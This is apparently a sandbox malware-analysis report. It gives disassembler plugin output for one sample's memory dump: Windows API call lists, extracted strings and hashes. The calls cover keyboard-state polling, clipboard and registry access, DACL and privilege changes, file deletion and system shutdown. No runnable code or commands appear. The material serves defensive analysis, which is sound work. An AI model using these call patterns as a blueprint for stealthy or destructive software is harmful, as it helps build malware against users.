                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                            • API String ID: 3953360268-2428617273
                                            • Opcode ID: c231a5ca221931f319f6c262d0f2a15065aa44e9f3bff60c99f26cba668f4051
                                            • Instruction ID: ea2e4695f9a32881d588032e84f7148554551f36cd94bdc69c8456ae3186914e
                                            • Opcode Fuzzy Hash: c231a5ca221931f319f6c262d0f2a15065aa44e9f3bff60c99f26cba668f4051
                                            • Instruction Fuzzy Hash: A5A14FB2508304ABC710EB60C895DEFB7ECAF98705F40591EF596E3192EB34DA49C762
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00E7F221
                                            • _wcscmp.LIBCMT ref: 00E7F236
                                            • _wcscmp.LIBCMT ref: 00E7F24D
                                            • GetFileAttributesW.KERNEL32(?), ref: 00E7F25F
                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00E7F279
                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00E7F291
                                            • FindClose.KERNEL32(00000000), ref: 00E7F29C
                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00E7F2B8
                                            • _wcscmp.LIBCMT ref: 00E7F2DF
                                            • _wcscmp.LIBCMT ref: 00E7F2F6
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00E7F308
                                            • SetCurrentDirectoryW.KERNEL32(00ECA5A0), ref: 00E7F326
                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E7F330
                                            • FindClose.KERNEL32(00000000), ref: 00E7F33D
                                            • FindClose.KERNEL32(00000000), ref: 00E7F34F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                            • String ID: *.*
                                            • API String ID: 1803514871-438819550
                                            • Opcode ID: 567b2ec52864aba8690447c8630548d1f659078123c7bc72af9fafe0435fa52a
                                            • Instruction ID: 44a97df5be2b92407bc10d55eb9ad6bc0658f629ee86a8d94175a965527656d1
                                            • Opcode Fuzzy Hash: 567b2ec52864aba8690447c8630548d1f659078123c7bc72af9fafe0435fa52a
                                            • Instruction Fuzzy Hash: 5D319E766002196EDB10DBB5EC59EEE77ECAF08364F149177E818F30A0EB34DA45CA50
                                            APIs
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E90BDE
                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E9F910,00000000,?,00000000,?,?), ref: 00E90C4C
                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00E90C94
                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00E90D1D
                                            • RegCloseKey.ADVAPI32(?), ref: 00E9103D
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E9104A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Close$ConnectCreateRegistryValue
                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                            • API String ID: 536824911-966354055
                                            • Opcode ID: 8a6d113cc9706e67caf63826dc8974dfebc5c9962037f5581f34b349ef175936
                                            • Instruction ID: 699ac0ba061870d9e6aae687d3d0611d157490ee76a70d9df4def6a5993bc51c
                                            • Opcode Fuzzy Hash: 8a6d113cc9706e67caf63826dc8974dfebc5c9962037f5581f34b349ef175936
                                            • Instruction Fuzzy Hash: E3027E752006119FCB14EF24C895E6AB7E5FF88714F04985DF89AAB3A2CB31ED45CB81
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00E7F37E
                                            • _wcscmp.LIBCMT ref: 00E7F393
                                            • _wcscmp.LIBCMT ref: 00E7F3AA
                                              • Part of subcall function 00E745C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E745DC
                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00E7F3D9
                                            • FindClose.KERNEL32(00000000), ref: 00E7F3E4
                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00E7F400
                                            • _wcscmp.LIBCMT ref: 00E7F427
                                            • _wcscmp.LIBCMT ref: 00E7F43E
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00E7F450
                                            • SetCurrentDirectoryW.KERNEL32(00ECA5A0), ref: 00E7F46E
                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E7F478
                                            • FindClose.KERNEL32(00000000), ref: 00E7F485
                                            • FindClose.KERNEL32(00000000), ref: 00E7F497
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                            • String ID: *.*
                                            • API String ID: 1824444939-438819550
                                            • Opcode ID: 906dcc78c332487fc5ae59e80a045793336b12eace8df58a1c0b982ae9a93874
                                            • Instruction ID: a4f0698ca9bd197c3ad96556d2722ddebe1840d4b1585ba8f00c779e214d515f
                                            • Opcode Fuzzy Hash: 906dcc78c332487fc5ae59e80a045793336b12eace8df58a1c0b982ae9a93874
                                            • Instruction Fuzzy Hash: 6431B1715012196FCB109F74EC89EEE77AC9F09328F149276E818F20A0EB34DA45CA60
                                            APIs
                                              • Part of subcall function 00E6874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E68766
                                              • Part of subcall function 00E6874A: GetLastError.KERNEL32(?,00E6822A,?,?,?), ref: 00E68770
                                              • Part of subcall function 00E6874A: GetProcessHeap.KERNEL32(00000008,?,?,00E6822A,?,?,?), ref: 00E6877F
                                              • Part of subcall function 00E6874A: HeapAlloc.KERNEL32(00000000,?,00E6822A,?,?,?), ref: 00E68786
                                              • Part of subcall function 00E6874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E6879D
                                              • Part of subcall function 00E687E7: GetProcessHeap.KERNEL32(00000008,00E68240,00000000,00000000,?,00E68240,?), ref: 00E687F3
                                              • Part of subcall function 00E687E7: HeapAlloc.KERNEL32(00000000,?,00E68240,?), ref: 00E687FA
                                              • Part of subcall function 00E687E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E68240,?), ref: 00E6880B
                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E6825B
                                            • _memset.LIBCMT ref: 00E68270
                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E6828F
                                            • GetLengthSid.ADVAPI32(?), ref: 00E682A0
                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00E682DD
                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E682F9
                                            • GetLengthSid.ADVAPI32(?), ref: 00E68316
                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E68325
                                            • HeapAlloc.KERNEL32(00000000), ref: 00E6832C
                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E6834D
                                            • CopySid.ADVAPI32(00000000), ref: 00E68354
                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E68385
                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E683AB
                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E683BF
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                            • String ID:
                                            • API String ID: 3996160137-0
                                            • Opcode ID: 448b0398f750897a4ebd41720554c41166313a52bac67e7867ffdef5fa25c931
                                            • Instruction ID: 15ad62de24937553412028a1f823254a260c642f903362ea8639e1bbb4410610
                                            • Opcode Fuzzy Hash: 448b0398f750897a4ebd41720554c41166313a52bac67e7867ffdef5fa25c931
                                            • Instruction Fuzzy Hash: D6615B71940209EFDF009FA5ED44AAEBBB9FF04744F14922AE815FA291DB319A15CB60
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa$PJ$UCP)$UTF)$UTF16)
                                            • API String ID: 0-1331342731
                                            • Opcode ID: 3e4c3cd2b67cde94df7a9e0ff2a2891e412fb06371628310d0bfc3eb23d6cdcc
                                            • Instruction ID: 705f43efe37212557b80f4dd9c0776234372b716d4ae9b1ca0d6bd7181d1ec1c
                                            • Opcode Fuzzy Hash: 3e4c3cd2b67cde94df7a9e0ff2a2891e412fb06371628310d0bfc3eb23d6cdcc
                                            • Instruction Fuzzy Hash: B4728071E002299BDB15DF58E8817EEB7B5FF88354F1491AAE845FB290DB309D81CB90
                                            APIs
                                              • Part of subcall function 00E910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E90038,?,?), ref: 00E910BC
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E90737
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E907D6
                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E9086E
                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00E90AAD
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E90ABA
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                            • String ID:
                                            • API String ID: 1240663315-0
                                            • Opcode ID: 4072985e19964bc5b1b429fdb8bdb10b0b280f897cef6361a6192f1d616af4da
                                            • Instruction ID: d3f3e3f05994fcf380a36939a60d0d8eae166f9eb89e990b60c5e52519698cd7
                                            • Opcode Fuzzy Hash: 4072985e19964bc5b1b429fdb8bdb10b0b280f897cef6361a6192f1d616af4da
                                            • Instruction Fuzzy Hash: 3BE16D31204310AFCB14DF29C891E6ABBF9EF89714F04946DF45AEB2A2DA30ED45CB51
                                            APIs
                                            • GetKeyboardState.USER32(?), ref: 00E70241
                                            • GetAsyncKeyState.USER32(000000A0), ref: 00E702C2
                                            • GetKeyState.USER32(000000A0), ref: 00E702DD
                                            • GetAsyncKeyState.USER32(000000A1), ref: 00E702F7
                                            • GetKeyState.USER32(000000A1), ref: 00E7030C
                                            • GetAsyncKeyState.USER32(00000011), ref: 00E70324
                                            • GetKeyState.USER32(00000011), ref: 00E70336
                                            • GetAsyncKeyState.USER32(00000012), ref: 00E7034E
                                            • GetKeyState.USER32(00000012), ref: 00E70360
                                            • GetAsyncKeyState.USER32(0000005B), ref: 00E70378
                                            • GetKeyState.USER32(0000005B), ref: 00E7038A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: State$Async$Keyboard
                                            • String ID:
                                            • API String ID: 541375521-0
                                            • Opcode ID: ded4dc9119db312672fbe559b20eec03ee642987c25488acc78ef2e071ee0452
                                            • Instruction ID: d829216ddb4961c1265286ab0a2b2a67129f54125c04f2e2c0dd86b4b08e120f
                                            • Opcode Fuzzy Hash: ded4dc9119db312672fbe559b20eec03ee642987c25488acc78ef2e071ee0452
                                            • Instruction Fuzzy Hash: DA4179645047C9FFFF319A6484087B5BFA06B12348F08D05ED5CD665D3E7945DC88792
                                            APIs
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            • CoInitialize.OLE32 ref: 00E88718
                                            • CoUninitialize.OLE32 ref: 00E88723
                                            • CoCreateInstance.OLE32(?,00000000,00000017,00EA2BEC,?), ref: 00E88783
                                            • IIDFromString.OLE32(?,?), ref: 00E887F6
                                            • VariantInit.OLEAUT32(?), ref: 00E88890
                                            • VariantClear.OLEAUT32(?), ref: 00E888F1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                            • API String ID: 834269672-1287834457
                                            • Opcode ID: 79064ca888bdf774a4cde6c6bddc1f97e1dcf87f29f1c4c763440b6da6c82c84
                                            • Instruction ID: de3a3b2e971e27beb2f799f447c7240280db612c8c55a63c3c57b7c00169b33d
                                            • Opcode Fuzzy Hash: 79064ca888bdf774a4cde6c6bddc1f97e1dcf87f29f1c4c763440b6da6c82c84
                                            • Instruction Fuzzy Hash: 3C6190706083019FD714EF64CA48B5ABBE4AF48714F94581EF989BB291CB70ED48CB92
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                            • String ID:
                                            • API String ID: 1737998785-0
                                            • Opcode ID: 1515cf53f5cb35f413f7b49f8d1edff00ade4f16efbd4b0f2ebe6b45ef891316
                                            • Instruction ID: cad758c8fb89ff93abe034ef025ac0b575e7d44574c315c4362ceb008a5d7879
                                            • Opcode Fuzzy Hash: 1515cf53f5cb35f413f7b49f8d1edff00ade4f16efbd4b0f2ebe6b45ef891316
                                            • Instruction Fuzzy Hash: 012181752012119FDB10AF65EC19B6D7BA8EF44715F10802BF94AFB2B2DB74AD04CB94
                                            APIs
                                              • Part of subcall function 00E148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E148A1,?,?,00E137C0,?), ref: 00E148CE
                                              • Part of subcall function 00E74CD3: GetFileAttributesW.KERNEL32(?,00E73947), ref: 00E74CD4
                                            • FindFirstFileW.KERNEL32(?,?), ref: 00E73ADF
                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00E73B87
                                            • MoveFileW.KERNEL32(?,?), ref: 00E73B9A
                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00E73BB7
                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E73BD9
                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00E73BF5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                            • String ID: \*.*
                                            • API String ID: 4002782344-1173974218
                                            • Opcode ID: 33fcf8ccaed72e389740de3c2ad522d90d143d32a76b63311d40c899b2fde21b
                                            • Instruction ID: 9c1a4499f28f8215fd73c42c560e11aa3d91ab9e2109922ed147824b21bced0c
                                            • Opcode Fuzzy Hash: 33fcf8ccaed72e389740de3c2ad522d90d143d32a76b63311d40c899b2fde21b
                                            • Instruction Fuzzy Hash: 3E51803180114D9ACF15EBB0CD929EDB7B9AF14304F64A1AAE44A77091EF306F4DDBA0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ERCP$Oa$VUUU$VUUU$VUUU$VUUU
                                            • API String ID: 0-3486589167
                                            • Opcode ID: a4ec3a7106d66fa66a80b1bed3fcd277913a005b66b0f31097a4c2ebb9b7a110
                                            • Instruction ID: 395d52a3d5e1b5638cc7e60ab0e62c40bf53a3442882a229ab91f3f9b0f8088f
                                            • Opcode Fuzzy Hash: a4ec3a7106d66fa66a80b1bed3fcd277913a005b66b0f31097a4c2ebb9b7a110
                                            • Instruction Fuzzy Hash: DFA29EB0E0422ACBDF28CF58E9407EDB7B1BB54319F14A5AAD856B7280D7709E85CF50
                                            APIs
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00E7F6AB
                                            • Sleep.KERNEL32(0000000A), ref: 00E7F6DB
                                            • _wcscmp.LIBCMT ref: 00E7F6EF
                                            • _wcscmp.LIBCMT ref: 00E7F70A
                                            • FindNextFileW.KERNEL32(?,?), ref: 00E7F7A8
                                            • FindClose.KERNEL32(00000000), ref: 00E7F7BE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                            • String ID: *.*
                                            • API String ID: 713712311-438819550
                                            • Opcode ID: 78fc8fc5ebdf0c8f10b837f8e056a6f0392a727e31a673a130d59061c703fd5e
                                            • Instruction ID: 5c72bae378ddc95d1131c833805ea21912acf12c1f7199160c139fb72bf078df
                                            • Opcode Fuzzy Hash: 78fc8fc5ebdf0c8f10b837f8e056a6f0392a727e31a673a130d59061c703fd5e
                                            • Instruction Fuzzy Hash: FA415E7191420A9FCF15DF64CC89AEEBBB4FF05314F14956AE819B61A1EB309E84CB90
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove
                                            • String ID:
                                            • API String ID: 4104443479-0
                                            • Opcode ID: 00ee8a7557a5f4351bf2ceccaf083b1703082baa2eb763f71c4dd425b46c0457
                                            • Instruction ID: 39a0a5a6b60228b233c8831a1ce796b7033cffbfd6f7e6b76acc334606459120
                                            • Opcode Fuzzy Hash: 00ee8a7557a5f4351bf2ceccaf083b1703082baa2eb763f71c4dd425b46c0457
                                            • Instruction Fuzzy Hash: 10128871A00619EBDF04CFA4EA85AEEB7F5FF48300F105569E446B7290EB36AD51CB50
                                            APIs
                                              • Part of subcall function 00E30FF6: std::exception::exception.LIBCMT ref: 00E3102C
                                              • Part of subcall function 00E30FF6: __CxxThrowException@8.LIBCMT ref: 00E31041
                                            • _memmove.LIBCMT ref: 00E6062F
                                            • _memmove.LIBCMT ref: 00E60744
                                            • _memmove.LIBCMT ref: 00E607EB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                            • String ID: yZ
                                            • API String ID: 1300846289-3798167742
                                            • Opcode ID: de6a26d1867f25d2c3e8f5e056e159eea369bf32fab8826f60b9c6180f447bea
                                            • Instruction ID: 75eb4d9142bfbe0908b80bb5dc6a701d3dd6b9138680417ae89e04b634cbe819
                                            • Opcode Fuzzy Hash: de6a26d1867f25d2c3e8f5e056e159eea369bf32fab8826f60b9c6180f447bea
                                            • Instruction Fuzzy Hash: F4029F71A00219DFCF08DF64E981AAEBBF5FF44340F1490A9E806EB255EB31DA55CB91
                                            APIs
                                              • Part of subcall function 00E68CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E68D0D
                                              • Part of subcall function 00E68CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E68D3A
                                              • Part of subcall function 00E68CC3: GetLastError.KERNEL32 ref: 00E68D47
                                            • ExitWindowsEx.USER32(?,00000000), ref: 00E7549B
                                            Strings
                                            Memory Dump Source
